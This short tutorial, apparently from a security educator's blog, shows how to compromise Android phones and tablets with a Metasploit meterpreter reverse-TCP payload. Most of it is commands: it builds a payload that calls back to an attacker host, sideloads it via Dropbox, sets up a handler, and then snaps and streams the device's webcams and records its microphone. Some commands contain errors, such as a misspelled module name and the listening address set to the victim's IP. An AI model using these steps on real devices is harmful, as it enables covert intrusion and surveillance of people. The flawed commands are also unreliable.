Exploiting Android with MetasploitThis article shows how an Android device can be compromised using Metasploit. The devices used as a Samsung S 8.4 tablet and an HTC M8 One smart phone, and the attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 192.168.0.24, and the Android devices are at 192.168.0.9 (Samsung) and 192.168.0.10 (HTC M8). Creating the VulnerabilityThe vulnerability will create a call-back from the Android device to Metasploit. So if the attacking host is at 192.168.0.24, and we callback on port 443, then we create the exploit with: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=443 Next we would save this to a shared folder (such as on Dropbox) and then install it on the device, otherwise it could be downloaded over the Internet. Using MetasploitOnce the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run: msfconsole and then setup a handler for the exploit: msf> use exploit/multi/hander Next we define the payload for the exploit: msf exploit> set payload android/meterpreter/reverse_tcp Finally we set the host connection details with the Samsung device with: msf exploit (handler) > set LHOST 192.168.0.9 msf exploit (handler) > set LPORt 443 msf exploit (handler) > exploit This then waits for a connection to the device, and once connected, Metasploit has a connection into the Android device:
Android and Metasploit from Bill Buchanan on Vimeo. The commands used are then: meterpreter > webcam_list 1 - Back Camera 2 - Front Camera meterpreter > webcam_snap 1 meterpreter > webcam_stream 1 meterpreter > record_mic -d 5 ConclusionsThis article shows how an intruder can gain access to an Android device remotely, once an exploit has been installed. |